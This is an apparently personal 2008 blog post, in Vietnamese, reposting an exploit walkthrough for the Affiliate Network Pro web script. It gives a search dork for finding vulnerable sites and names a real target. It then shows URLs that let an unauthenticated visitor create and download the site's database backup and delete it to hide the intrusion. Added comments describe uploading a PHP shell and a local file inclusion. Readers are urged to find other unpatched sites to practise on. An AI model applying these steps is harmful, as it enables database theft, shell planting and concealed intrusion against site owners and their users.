Search google

Google
 

This is the place where I leave my scripts, my useful files, glad to have your suggestions. If you want to make discuss, please contact me at YM id bornbygoogle or my mail bornbygoogle@yahoo.com or simply let ur mail. I'll try to contact as soon as possible :) Nice to see you :D

Wednesday, January 23, 2008

Affiliate Network Pro vulnerability !!!!

Nguồn: http://www.securityfocus.com/archive/1/481206

Lâu rồi, chăm sóc vợ sắp đẻ nên H2P không tham gia forum. Hôm nay ngồi ngứa nghề tìm ra cái bug stupid nhưng khá nguy hiểm.
Cũng chẳng có gì cao siêu nên H2P mới gọi là stupid bug, nhưng vấn đề là khai thác toàn diện. Lòng vòng nhiều quá, ta vào cuộc:
google keyword: allinurl: "index.php?Act=Merchants" Kết quả kha khá nhỉ? Thử thay trang tìm kiếm khác và vài từ khóa khác tự nghĩ ra nhé, hỏi là tớ chửi cho đấy.
Thử thằng đầu tiên nhé: http://www.eduaffiliates.com/index.php?Act=Merchants

1. http://www.eduaffiliates.com/admin/dump
sẽ thấy backup-23-08-2007.sql cái gì đây, lol file backup của nó đấy.
Trong trường hợp thư mục được bảo vệ bằng 1 file index, .htaccess, nó chưa backup hoặc file backup đã quá cũ (ngày tháng năm backup nằm trong tên file ấy) mà mình muốn lấy file backup mới nhất thì sao.

2. Tạo file backup
- http://www.eduaffiliates.com/admin/backupstart.php
click vào nút Backup
a. Quay lại: http://www.eduaffiliates.com/admin/dump
sẽ thấy file backup-14-09-2007.sql là file ta vừa tạo ra (ngày 14-09-2007) get it.
b. Trong trường hợp thư mục được bảo vệ bằng 1 file index, bạn không thấy được thì làm sao download. Đơn giản: http://www.eduaffiliates.com/admin/dump/backup-dd-mm-yyyy.sql
thay ngày tháng năm theo giờ sever nhé.
c. Trong trường hợp thư mục được bảo vệ bằng 1 file .htaccess bạn sẽ nhận lỗi Forbiden, cũng đơn giản thôi http://www.eduaffiliates.com/admin/downloadbackup.php?fl=backup-dd-mm-yyyy.sql

3. Xóa dấu vết
Đây là bước quan trọng để admin không biết bị đột nhập: http://www.eduaffiliates.com/admin/deletebackup.php?fl=backup-dd-mm-yyyy.sql

Ghi chú: Trang eduaffiliates.com đã die, tìm trang khác để thực hành. Một vài trang đã fix, Còn khá nhiều trang dính đấy.

- Added by leo9x:
http://[site]/[path]/admin/backupstart.php
Upload len shell file dạng .php.sql sẽ run được trên nhiều server: http://[site]/[path]/admin/dump/file.php.sql
- Added by navaro:
http://[site]/[path]/admin/downloadbackup.php?fl=[filename] -->Local File Inclusion


COMPLETED - H2P from HVA.

No comments:

Convert Megaupload links to Rapidshare links !

If someone want to convert Megaupload to Rapidshare links, please let me know, I'll do it for you ! ( for free, all ). If you want, please send those links to me, with the mail title : Convert to Rapidshare !. My mail is bornbygoogle@yahoo.com. Or YM ID : bornbygoogle.

Nice to help you ! :)